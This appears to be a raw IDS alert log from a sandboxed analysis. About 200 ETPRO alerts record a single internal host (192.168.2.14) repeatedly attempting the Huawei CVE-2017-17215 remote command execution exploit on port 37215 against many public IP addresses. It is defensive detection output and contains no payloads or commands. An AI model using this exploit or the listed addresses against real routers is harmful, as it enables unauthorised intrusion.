                                                    07/10/24-08:27:34.136895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659437215192.168.2.1441.148.15.235
                                                    07/10/24-08:27:02.868135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516237215192.168.2.14197.74.70.191
                                                    07/10/24-08:26:59.664822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262037215192.168.2.1441.184.248.218
                                                    07/10/24-08:27:07.396195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807637215192.168.2.14157.129.141.164
                                                    07/10/24-08:26:45.594694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566837215192.168.2.1441.132.83.200
                                                    07/10/24-08:26:57.561503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886037215192.168.2.1441.177.66.181
                                                    07/10/24-08:27:02.966535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3718637215192.168.2.1441.77.207.53
                                                    07/10/24-08:27:20.418870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4923637215192.168.2.14157.206.30.28
                                                    07/10/24-08:26:15.764270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530037215192.168.2.1441.117.125.191
                                                    07/10/24-08:26:20.165176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964437215192.168.2.14197.23.102.212
                                                    07/10/24-08:27:07.259600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599637215192.168.2.14157.195.73.0
                                                    07/10/24-08:27:28.074173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3413837215192.168.2.1441.87.233.12
                                                    07/10/24-08:26:11.541811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939837215192.168.2.14111.212.211.64
                                                    07/10/24-08:26:28.860348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5406037215192.168.2.1441.116.221.252
                                                    07/10/24-08:27:23.909366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081037215192.168.2.1441.222.164.87
                                                    07/10/24-08:26:26.542199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256637215192.168.2.1441.84.64.255
                                                    07/10/24-08:27:30.516860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953437215192.168.2.14130.115.214.113
                                                    07/10/24-08:26:23.296739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895237215192.168.2.1441.235.90.27
                                                    07/10/24-08:26:49.817935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991037215192.168.2.14157.89.214.102
                                                    07/10/24-08:26:47.739348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838037215192.168.2.14163.220.169.12
                                                    07/10/24-08:26:28.647124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392237215192.168.2.1486.49.99.142
                                                    07/10/24-08:27:19.334361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079637215192.168.2.14197.63.222.194
                                                    07/10/24-08:26:38.638682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574037215192.168.2.14157.28.38.133
                                                    07/10/24-08:26:22.213907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891837215192.168.2.1441.173.143.223
                                                    07/10/24-08:26:23.318563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3732837215192.168.2.14197.86.155.2
                                                    07/10/24-08:27:14.839655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821037215192.168.2.1441.122.45.41
                                                    07/10/24-08:26:28.906271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985837215192.168.2.1441.103.140.223
                                                    07/10/24-08:27:31.448352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074437215192.168.2.1424.77.177.19
                                                    07/10/24-08:26:31.070289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4161637215192.168.2.1441.150.61.210
                                                    07/10/24-08:27:33.810871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615237215192.168.2.1441.12.215.200
                                                    07/10/24-08:26:38.634694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820037215192.168.2.14197.47.23.64
                                                    07/10/24-08:26:18.027188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008637215192.168.2.14197.106.24.5
                                                    07/10/24-08:27:08.360438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775437215192.168.2.1434.9.73.38
                                                    07/10/24-08:27:22.922024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3367837215192.168.2.14141.111.16.79
                                                    07/10/24-08:27:31.561854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302837215192.168.2.14157.17.63.122
                                                    07/10/24-08:26:36.399682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4613437215192.168.2.1441.143.233.151
                                                    07/10/24-08:27:32.513805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467237215192.168.2.14157.155.65.133
                                                    07/10/24-08:26:13.836737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5149037215192.168.2.1441.170.153.138
                                                    07/10/24-08:26:47.979211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233237215192.168.2.14157.226.160.152
                                                    07/10/24-08:26:59.861773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502037215192.168.2.14197.226.232.204
                                                    07/10/24-08:26:13.671571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892437215192.168.2.1494.88.202.208
                                                    07/10/24-08:26:22.275564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446437215192.168.2.14216.52.203.244
                                                    07/10/24-08:27:05.159801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448637215192.168.2.14197.152.225.222
                                                    07/10/24-08:27:13.915007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587637215192.168.2.1441.224.211.137
                                                    07/10/24-08:26:22.288558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641437215192.168.2.14157.50.63.83
                                                    07/10/24-08:26:48.012931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5401837215192.168.2.1441.77.114.124
                                                    07/10/24-08:26:15.863530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4910437215192.168.2.1441.75.184.251
                                                    07/10/24-08:26:53.197285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862437215192.168.2.14197.91.126.82
                                                    07/10/24-08:27:22.922579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131037215192.168.2.14157.222.126.78
                                                    07/10/24-08:26:22.300900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629037215192.168.2.14197.132.133.5
                                                    07/10/24-08:27:32.572327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927837215192.168.2.14157.186.184.81
                                                    07/10/24-08:27:02.973887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981637215192.168.2.14157.227.123.31
                                                    07/10/24-08:27:05.121354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906437215192.168.2.14157.231.236.90
                                                    07/10/24-08:26:59.774458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5312437215192.168.2.14197.63.211.206
                                                    07/10/24-08:27:13.879424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3752837215192.168.2.14197.115.67.85
                                                    07/10/24-08:26:43.737696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5978037215192.168.2.14204.163.149.58
                                                    07/10/24-08:27:07.337893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014437215192.168.2.1474.24.181.228
                                                    07/10/24-08:26:28.795318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095837215192.168.2.14197.11.15.58
                                                    07/10/24-08:26:36.416571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557437215192.168.2.1418.3.195.106
                                                    07/10/24-08:26:55.446597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612637215192.168.2.1441.26.40.9
                                                    07/10/24-08:26:29.877768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405837215192.168.2.14157.113.238.226
                                                    07/10/24-08:26:43.779855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3564637215192.168.2.14157.199.222.123
                                                    07/10/24-08:26:52.063686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4300637215192.168.2.14129.148.62.187
                                                    07/10/24-08:27:33.907350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484437215192.168.2.1441.8.16.15
                                                    07/10/24-08:26:22.290306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269037215192.168.2.14197.252.37.14
                                                    07/10/24-08:26:42.406060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317437215192.168.2.1481.132.123.195
                                                    07/10/24-08:26:43.594845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362037215192.168.2.14157.105.218.235
                                                    07/10/24-08:27:27.161744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3996837215192.168.2.1450.101.207.107
                                                    07/10/24-08:27:13.987443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338237215192.168.2.14157.127.251.10
                                                    07/10/24-08:26:17.962060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683837215192.168.2.14197.10.211.211
                                                    07/10/24-08:26:11.466916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600637215192.168.2.14157.233.213.23
                                                    07/10/24-08:26:13.805293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5086237215192.168.2.14157.134.15.66
                                                    07/10/24-08:27:17.000608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927237215192.168.2.14191.192.44.253
                                                    07/10/24-08:26:13.819532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965637215192.168.2.1441.121.235.201
                                                    07/10/24-08:26:20.188191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931237215192.168.2.1441.192.168.60
                                                    07/10/24-08:27:07.254961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826037215192.168.2.1483.28.242.92
                                                    07/10/24-08:27:14.830052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410437215192.168.2.1441.24.114.80
                                                    07/10/24-08:26:42.386874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554237215192.168.2.1486.65.144.34
                                                    07/10/24-08:26:28.914881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3646037215192.168.2.1441.162.172.67
                                                    07/10/24-08:27:07.384931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441237215192.168.2.14197.157.134.244
                                                    07/10/24-08:27:32.576530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304437215192.168.2.14157.213.176.137
                                                    07/10/24-08:26:53.207005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575837215192.168.2.1441.58.33.33
                                                    07/10/24-08:27:13.842727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632237215192.168.2.1485.114.114.72
                                                    07/10/24-08:27:02.864338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764037215192.168.2.14157.53.191.72
                                                    07/10/24-08:26:42.461757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927437215192.168.2.1441.81.1.59
                                                    07/10/24-08:27:23.817367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4471437215192.168.2.1441.80.231.172
                                                    07/10/24-08:27:28.131981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4730237215192.168.2.14174.126.85.252
                                                    07/10/24-08:26:22.295095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491037215192.168.2.1441.99.153.94
                                                    07/10/24-08:27:27.177890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.14157.158.116.201
                                                    07/10/24-08:26:11.178484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685237215192.168.2.14157.144.212.156
                                                    07/10/24-08:26:49.819552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686837215192.168.2.1441.67.72.38
                                                    07/10/24-08:26:33.165723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084237215192.168.2.14197.41.66.71
                                                    07/10/24-08:27:02.692447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517037215192.168.2.14157.140.35.184
                                                    07/10/24-08:27:03.011649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417437215192.168.2.14216.69.222.84
                                                    07/10/24-08:26:59.667418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053237215192.168.2.14104.194.88.255
                                                    07/10/24-08:26:11.120282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860437215192.168.2.14125.39.64.172
                                                    07/10/24-08:27:30.514840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4058637215192.168.2.1478.215.78.120
                                                    07/10/24-08:27:23.781687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138237215192.168.2.14197.193.243.125
                                                    07/10/24-08:26:38.599918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471637215192.168.2.14111.26.127.235
                                                    07/10/24-08:26:47.860758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5115637215192.168.2.14157.176.144.28
                                                    07/10/24-08:26:49.778030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703437215192.168.2.14193.106.74.6
                                                    07/10/24-08:26:52.022558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883437215192.168.2.14157.184.158.60
                                                    07/10/24-08:26:41.440883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014237215192.168.2.14157.214.106.141
                                                    07/10/24-08:27:07.393644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839237215192.168.2.14157.201.19.145
                                                    07/10/24-08:26:17.996817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891837215192.168.2.14197.214.170.211
                                                    07/10/24-08:26:22.272664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420837215192.168.2.1441.73.79.247
                                                    07/10/24-08:26:51.975524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152037215192.168.2.1441.139.191.29
                                                    07/10/24-08:26:59.663550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063237215192.168.2.14197.182.1.39
                                                    07/10/24-08:26:26.561697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959637215192.168.2.14149.163.25.98
                                                    07/10/24-08:27:14.830052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165837215192.168.2.1441.195.134.5
                                                    07/10/24-08:27:27.047210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947237215192.168.2.14146.58.37.202
                                                    07/10/24-08:26:43.597937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538837215192.168.2.1441.106.159.163
                                                    07/10/24-08:26:45.616284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440037215192.168.2.14197.124.172.237
                                                    07/10/24-08:26:38.552864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3360237215192.168.2.1462.31.57.238
                                                    07/10/24-08:26:43.907238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5470237215192.168.2.1441.73.83.116
                                                    07/10/24-08:27:08.432094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291837215192.168.2.14157.236.118.214
                                                    07/10/24-08:26:20.186455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204037215192.168.2.14197.180.141.223
                                                    07/10/24-08:26:41.600152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4236837215192.168.2.1441.28.23.90
                                                    07/10/24-08:27:19.328472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345037215192.168.2.14172.222.254.71
                                                    07/10/24-08:26:26.584785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3905637215192.168.2.1441.175.212.214
                                                    07/10/24-08:27:10.617808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176637215192.168.2.14197.70.85.7
                                                    07/10/24-08:27:31.479319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618237215192.168.2.1441.98.59.109
                                                    07/10/24-08:26:43.664529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3895437215192.168.2.14197.210.5.129
                                                    07/10/24-08:27:11.538749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3745037215192.168.2.14157.83.36.160
                                                    07/10/24-08:26:13.778157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3757037215192.168.2.14197.204.104.14
                                                    07/10/24-08:26:25.454696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673637215192.168.2.14157.149.67.70
                                                    07/10/24-08:26:31.081333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468037215192.168.2.14197.73.221.38
                                                    07/10/24-08:26:33.252784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605037215192.168.2.1441.82.32.196
                                                    07/10/24-08:26:13.647460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676437215192.168.2.1441.252.153.32
                                                    07/10/24-08:26:22.216208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3426037215192.168.2.14157.41.14.248
                                                    07/10/24-08:26:28.937800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939437215192.168.2.1441.70.242.214
                                                    07/10/24-08:26:41.512064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776037215192.168.2.1441.46.78.184
                                                    07/10/24-08:26:33.177669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6029837215192.168.2.1441.220.31.131
                                                    07/10/24-08:26:36.357123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968237215192.168.2.14157.69.161.61
                                                    07/10/24-08:26:48.019858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4827237215192.168.2.1441.229.87.249
                                                    07/10/24-08:27:19.294744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4228637215192.168.2.1441.129.191.196
                                                    07/10/24-08:26:13.841293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917837215192.168.2.1441.210.14.163
                                                    07/10/24-08:26:17.989369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393837215192.168.2.14157.234.58.38
                                                    07/10/24-08:26:59.816598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034237215192.168.2.14197.129.134.177
                                                    07/10/24-08:26:28.647511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335237215192.168.2.14197.230.195.231
                                                    07/10/24-08:26:53.176697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502437215192.168.2.14197.254.92.79
                                                    07/10/24-08:27:30.483664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383837215192.168.2.1441.34.157.145
                                                    07/10/24-08:26:38.657439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433637215192.168.2.1441.197.67.7
                                                    07/10/24-08:26:55.398753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596037215192.168.2.14129.107.191.14
                                                    07/10/24-08:26:43.529694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512637215192.168.2.1441.241.152.147
                                                    07/10/24-08:27:23.948624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341837215192.168.2.1484.98.221.218
                                                    07/10/24-08:27:11.522435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5444237215192.168.2.14157.112.26.224
                                                    07/10/24-08:26:59.822486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842037215192.168.2.1441.165.70.170
                                                    07/10/24-08:27:08.278598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932037215192.168.2.14157.120.143.60
                                                    07/10/24-08:27:33.764696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262237215192.168.2.14197.27.98.50
                                                    07/10/24-08:27:27.164992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629837215192.168.2.14157.24.141.150
                                                    07/10/24-08:27:31.521527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568037215192.168.2.14197.4.11.165
                                                    07/10/24-08:26:43.550517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918837215192.168.2.14157.203.46.217
                                                    07/10/24-08:26:55.366759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4136837215192.168.2.14197.43.4.240
                                                    07/10/24-08:27:22.939147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135637215192.168.2.1441.193.142.135
                                                    07/10/24-08:26:14.624434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506637215192.168.2.14157.195.156.138
                                                    07/10/24-08:27:08.441013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6074637215192.168.2.14157.40.32.152
                                                    07/10/24-08:27:14.828457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5831437215192.168.2.14157.174.165.174
                                                    07/10/24-08:27:30.560872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4220037215192.168.2.14174.14.137.26
                                                    07/10/24-08:26:11.558206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046037215192.168.2.1425.174.195.250
                                                    07/10/24-08:27:10.547644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499637215192.168.2.1418.168.73.181
                                                    07/10/24-08:26:22.231914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468837215192.168.2.1441.33.30.179
                                                    07/10/24-08:27:08.410834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887637215192.168.2.14197.212.250.113
                                                    07/10/24-08:26:29.826099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345037215192.168.2.14157.94.75.226
                                                    07/10/24-08:26:48.015803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349637215192.168.2.14157.184.139.44
                                                    07/10/24-08:26:41.615628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103637215192.168.2.14197.7.94.140
                                                    07/10/24-08:26:42.463923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611637215192.168.2.14157.39.189.18
                                                    07/10/24-08:27:31.474982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236637215192.168.2.14157.226.116.17
                                                    07/10/24-08:26:43.574763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967437215192.168.2.1441.170.62.200
                                                    07/10/24-08:27:03.030888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452837215192.168.2.14197.182.227.31
                                                    07/10/24-08:27:22.861030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043437215192.168.2.14223.185.249.107
                                                    07/10/24-08:26:25.445114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4421637215192.168.2.1441.38.75.23
                                                    07/10/24-08:26:26.593933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698237215192.168.2.14157.228.35.182
                                                    07/10/24-08:26:42.177272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332837215192.168.2.1441.253.235.116
                                                    07/10/24-08:26:28.648107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3682237215192.168.2.1424.71.190.65
                                                    07/10/24-08:26:33.247201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4819437215192.168.2.14197.131.154.97
                                                    07/10/24-08:27:31.550771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267437215192.168.2.14197.149.254.206
                                                    07/10/24-08:26:28.758011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5317837215192.168.2.1491.57.88.109
                                                    07/10/24-08:26:59.651235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397437215192.168.2.1432.238.171.95
                                                    07/10/24-08:26:11.119268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4994837215192.168.2.1441.235.118.49
                                                    07/10/24-08:26:34.208199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377237215192.168.2.14157.103.23.8
                                                    07/10/24-08:27:28.130365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805237215192.168.2.14176.143.144.91
                                                    07/10/24-08:26:43.793102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563037215192.168.2.14157.49.244.6
                                                    07/10/24-08:27:33.810872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863037215192.168.2.14197.86.98.68
                                                    07/10/24-08:26:22.285937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611037215192.168.2.14157.62.253.3
                                                    07/10/24-08:26:38.524436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287437215192.168.2.14216.28.100.167
